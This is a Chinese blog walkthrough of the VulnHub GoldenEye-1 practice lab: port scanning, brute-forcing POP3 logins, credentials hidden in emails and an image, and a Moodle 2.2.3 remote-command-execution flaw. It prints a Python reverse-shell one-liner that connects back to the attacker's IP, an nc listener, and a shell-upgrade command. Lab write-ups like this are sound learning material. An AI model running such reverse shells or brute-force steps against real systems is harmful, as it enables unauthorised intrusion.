VulnHub之GoldenEye靶场(2)

最新推荐文章于 2025-05-29 20:18:02 发布
最新推荐文章于 2025-05-29 20:18:02 发布
阅读量318 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: linux 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/p_utao/article/details/113847482
本文讲述了作者在Vulnhub平台的GoldenEye-1挑战中,通过端口扫描、爆破弱口令、解析邮件线索,逐步找到隐藏的账号密码,利用POP3协议获取更多信息,并最终实现Linux系统提权的过程。涉及的技术包括Apache、邮件客户端、远程命令执行漏洞和Python逆向工程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶场信息:

地址:https://www.vulnhub.com/entry/goldeneye-1,240/
难度:简单
目标:root目录下flag.txt 文件
运行:VirtualBox(网络桥接)

信息收集

老规矩上来先扫描端口
在这里插入图片描述
常见端口开放25、80、110端口,访问网站,爆下目录(无果),随便爆破一下25端口的弱口令(无果)
在这里插入图片描述
中间件:apache
在这里插入图片描述
然后通过上面得提示访问/sev-home/这个目录,有登陆但是没有密码,这里我打算爆破来着,f12源代码里面有
在这里插入图片描述
有趣得对话,这里莫非是让我们去找那个女的,鬼才信
在这里插入图片描述
拿着:InvincibleHack3r
在这里插入图片描述
我还以为用户是UNKNOWN呢,找了半天,既然有了账号密码直接登陆,还好直接看大佬得文章了

账号:boris
密码:InvincibleHack3r

在这里插入图片描述
这里好像很厉害的样子,我们继续看看源代码,最下面有两个用户名
在这里插入图片描述
使用超级弱口令,由于这里不是默认端口,所以要自己设置一下
在这里插入图片描述

POP3 命令包括:

USER username 认证用户名        
PASS password 认证密码认证,认证通过则状态转换        
APOP name,digest 认可一种安全传输口令的办法,执行成功导致状态转换,请参见 RFC 1321 。        
STAT 处理请求 server 回送邮箱统计资料,如邮件数、 邮件总字节数        
UIDL n 处理 server 返回用于该指定邮件的唯一标识, 如果没有指定,返回所有的。        
LIST n 处理 server 返回指定邮件的大小等        
RETR n 处理 server 返回邮件的全部文本        
DELE n 处理 server 标记删除,QUIT 命令执行时才真正删除        
RSET 处理撤消所有的 DELE 命令        
TOP n,m 处理 返回 n 号邮件的前 m 行内容,m 必须是自然数        
NOOP 处理 server 返回一个肯定的响应        
QUIT 希望结束会话。如果 server 处于"处理" 状态,则现在进入"更新"状态,删除那些标记成删除的邮件。如果 server 处于"认可"状态,则结束会话时 server 不进入"更新"状态 。

在这里插入图片描述
在第二封中发现账号和密码
在这里插入图片描述
我们现根据邮件提示添加本地域名:severnaya-station.com
在这里插入图片描述
然后访问这个网站
在这里插入图片描述
使用邮件的账号和密码登陆成功
在这里插入图片描述
发现用户,但是没有密码继续爆破
在这里插入图片描述

账号:doak
密码:goat

继续看邮件,救救孩子吧!
在这里插入图片描述
又发现一个账号和密码,退出上次的账号,登陆这个
在这里插入图片描述
发现目录中有个txt,下载打开发现个图片的地址
在这里插入图片描述
打开发现一张西装男人的照片在这里插入图片描述
下载
在这里插入图片描述

根据邮件提示查看图片内容,我们通过使用strings 查看jpg内容,发现base64编码
在这里插入图片描述
解码完成,线索是个admin的密码在这里插入图片描述
发现cms的版本
在这里插入图片描述
查询moodle 2.2.3漏洞 发现存在远程命令执行漏洞
编号:cve-2013-3630
在这里插入图片描述
配置好各种参数后执行失败,靶机系统界面默认是google spell,要将靶机系统上修改为PSpellShell
在这里插入图片描述
上面那个我复现不了,这里还能上传代码

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.64.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

在这里插入图片描述
打开nc监听6666端口

nc -lnvp 6666

在这里插入图片描述
成功!!!tty:python -c 'import pty; pty.spawn("/bin/bash")'

提权知识:https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

啊!复现的好心累啊!两种方式都不行,哭唧唧

参考文章:
https://blog.youkuaiyun.com/shenyu_1126/article/details/109460248
https://blog.youkuaiyun.com/qq_34801745/article/details/103724325
https://www.cnblogs.com/heguoze/p/12052353.html

GoldenEye-v1靶场
qq_35355737的博客
06-05 2001
GoldenEye-v1靶场
vulnhub靶场之【GoldenEye靶机】,推荐
China_I_LOVE的博客
01-16 1602
对于pop3服务该怎么进行爆破,记得hydra工具强大,支持很多协议的 暴力破解对于pop3服务,连接后的基本命令要知道对于各种编码要了解,省的再去识别对于图片隐藏信息也要会发现,这里 采用exiftool对于插件编辑器,可能存在代码执行的操作,这里是借助引擎,以及指向拼写的路径,修改这里导致反弹shell对于靶机内的信息要会收集,各种操作系统版本,内核信息,网络状态等等。
vulnhub靶场GoldenEye靶场
zzzzzzkeai的博客
11-17 417
vulnhub靶场GoldenEye靶场
Vulhub靶场搭建(Ubuntu)
最新发布
m0_73135216的博客
05-29 494
主要用于学习和复现各类 Web 安全漏洞。它的核心特征是通过 Docker 环境快速搭建出带有特定漏洞的靶场系统,适合渗透测试学习者、网络安全研究员和开发者。前言:Vulhub 是一个开源的漏洞靶场平台,全称是。任务一 主机挂载代理(允许下局域网联机)任务二 安装Docker。
VulnHub渗透靶场-GoldenEye
m0_74631795的博客
10-17 1287
我们只能有一套这样的访问代码,我们需要确保它们的安全,以便进行最后的执行。由于这是一个新系统,请在发现任何配置问题时,尤其是与安全相关的问题,及时告知我或Boris。如果你还没有我们内部域名的URL:severnaya-station.com/gnocertdir **请确保编辑你的主机文件,因为你通常在网络外远程工作....由于你使用的是Linux系统,只需在/etc/hosts中将这台服务器的IP指向severnaya-station.com。詹姆斯, 如果你正在读这个信息,恭喜你已经走到了这一步。
GoldEye渗透测试vulnhub
weixin_56537388的博客
06-18 278
set rhost severnaya-station.com ---设置:rhosts severnaya-station.com。set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse。nmap -p- 192.168.85.130 (-p-:全端口扫描 -p3306:仅仅扫描3306端口)set targeturi /gnocertdir ---设置目录: /gnocertdir。
vulnhub-GoldenEye靶机通关(超详细)
weixin_53730939的博客
12-27 3656
vulnhub-GoldenEye靶机通关(超详细)
1、GoldenEye-靶机-百个项目计划
Labi的博客
01-14 1565
大家好,因为自己是一个刚入门网安不久的新人,现在想通过打一些靶机来进行学习,这里的计划是通过百个项目来进行实操,巩固自己的基础。发文也是记录一下自己的开始,文章会写的比较详细,让0基础的小白跟着做也会。本文仅用于技术讨论与研究,如用作非法用途作者概不负责。GoldenEye也是我们新手入门必打靶机,那我们就开始进入正文吧。
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3625
vulnhub靶场{GoldenEye-v1靶场实战}
vulnhub靶场——GOLDENEYE: 1 渗透记录
ShenZ的博客
02-10 2470
vulnhubGOLDENEYE: 1 vulnhub靶场——GOLDENEYE: 1 渗透记录 About Description 一、信息搜集 二、网站渗透 三、Moodle漏洞利用
Vulnhub系列-GoldenEye-v1
Yasso的博客
01-04 770
靶机:192.168.12.132 kali:192.168.12.128 一、信息搜集 nmap -A -p- 192.168.12.132 查看80端口 web目录:/sev-home 访问发现需要用户名和密码 查看源代码 terminal.js 访问terminal.js文件 一串unicode编码 Boris的password 得到:用户名/密码=boris/InvincibleHack3r 成功登陆 查看源代码发现两个用户名 Natalya Boris 爆破密码 hydra -l Boris -P
vulnhub靶机GoldenEye实战(记录向)
kiwi的博客
02-01 466
接着我就去乱翻,翻到了一份邮件,是doak用户给我的。其实在另外一边我也尝试了搞25端口,因为我从来没有搞过25端口,按照老办法就是将扫描到的版本信息进行漏洞搜索,先问问度娘postfix smtp有什么漏洞,期间我查阅了大量资料,发现有一个漏洞可以进行邮件伪造,结合上面登录成功后的提示信息,我怀疑可能需要发送邮件给GNO,但是我哪里知道它的邮箱是什么,于是便在网上查阅信息,能否有一种方案能够通过ip发送,无奈,没有。我们改好了hosts文件,尝试访问登录,看起来像cms,但是我不确定,上。
[适宜小白]GoldenEye靶场-渗透测试全流程
SRC挖掘小白,擅长CTF-Misc、Web[团队Misc、Web小小主攻手],目前还在学习当中,请各位师傅多多指导,愿意倾听!
11-08 1295
新入小白,学习渗透测试
【甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
人间体佐菲的博客
08-29 2015
Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
【vulhub靶场GoldenEye
今天是几号的博客
04-04 1657
pwd=90lq靶机:10.10.10.155关于复现,我把所有的试错过程也直接写上出了,尽管对于最终获得flag步骤有点多余TTY 是一个缩写,代表着 Teletype,它是一种早期的文字终端设备。在计算机早期,TTY是用于与计算机交互的主要方式之一,用户可以通过键盘输入指令并在屏幕上看到计算机的响应。如今,TTY通常被用来描述一个连接到终端设备的进程或会话。TTY 可以在本地终端、SSH 连接、串口连接等各种情况下使用,
记一次GoldenEye靶场渗透测试过程
c_programj的博客
09-16 1893
记一次GoldenEye靶场渗透测试过程 靶场下载连接: 链接:https://pan.baidu.com/s/1qSU-0h8S-HyV-tkhGvCe3A 提取码:n2hq 下载完成之后,在VMware直接打开虚拟机,选择该.ova文件即可。 KALI攻击机:192.168.43.126 GoldenEye靶机:192.168.43.27 一、信息收集 1、使用nmap进行信息收集,查找同网段下的主机:namp -sP 192.168.43.0/24 Nmap -sP 扫描所在网段存货主机(可以扫到所在
vulnhub靶场,DC-8
kukudeshuo的博客
07-16 609
vulnhub靶场,DC-8 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-8(192.168.58.151) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan -l确定目标靶机 确定目标靶机IP为192.168.58.151 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 网站目录结构扫描 发现robots.txt文件,访问rob
如何系统地学习并掌握使用VulnHub靶机进行网络安全实战的技能?请提供具体的学习路径和建议。
11-05
学习网络安全实战技能,VulnHub靶机是一个非常好的实践平台。为了系统地掌握相关技能,推荐你遵循以下学习路径:首先,确保你具备网络安全基础知识,包括网络协议、操作系统基础、编程基础和简单的Web技术知识。接着,你可以通过阅读《VulnHub靶机实战教程:全面解析与 Walkthrough》来了解如何利用靶机进行实战学习,该教程详尽介绍了多个VulnHub靶机的攻克过程。学习路径具体步骤如下: 参考资源链接:[VulnHub靶机实战教程:全面解析与 Walkthrough](https://wenku.csdn.net/doc/5armww4y1r?spm=1055.2569.3001.10343) 1. **基础技能学习**:从网络安全和渗透测试的基础知识开始,了解常见的网络攻击和防御机制,掌握使用一些基础工具,如nmap、Wireshark、Metasploit等。 2. **靶机选择**:选择一个简单的VulnHub靶机,例如DC系列靶机,从基础的网络侦查开始,逐步学习如何识别开放端口和服务。 3. **漏洞利用学习**:针对靶机上发现的漏洞,学习相应的利用方法。例如,如果靶机存在SQL注入漏洞,就学习SQL注入的原理和利用技巧。 4. **深入学习**:随着技能的提升,选择更复杂的靶机进行学习,如AI:Web:2,挑战更高级的Web漏洞利用。 5. **综合技能提升**:通过解决DC系列靶机中的多层面挑战,全面提升自己的网络侦查、漏洞分析、系统渗透等综合技能。 6. **高级挑战**:最终,可以尝试更为复杂的靶机,比如EVM:1和GoldenEye:1,挑战加密漏洞和恶意软件分析等高级技能。 7. **实践与总结**:不断实践,记录每次攻防过程,总结经验教训。学习过程中可以参考《VulnHub靶机实战教程:全面解析与 Walkthrough》中的案例,分析作者的思考过程和解决方法。 在整个学习过程中,应不断回顾和总结,尝试站在攻击者的角度思考问题,并不断提问自己:‘我在这个靶机中学到了什么?我能否应用这些知识解决实际问题?’通过这样系统的学习,你将逐渐建立起完整的网络安全知识体系,并能有效地应用于实战中。 如果你已经对基础知识有所掌握,想要进一步提升技能,建议在掌握了《VulnHub靶机实战教程:全面解析与 Walkthrough》的基础上,结合更多的实战资源进行学习。例如,参加在线的网络安全竞赛,或是在实验室环境中搭建自己的靶场进行模拟攻击。同时,可以关注一些网络安全领域的专家和他们的博客或视频教程,以获取最新的安全动态和高级技巧。 参考资源链接:[VulnHub靶机实战教程:全面解析与 Walkthrough](https://wenku.csdn.net/doc/5armww4y1r?spm=1055.2569.3001.10343)
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值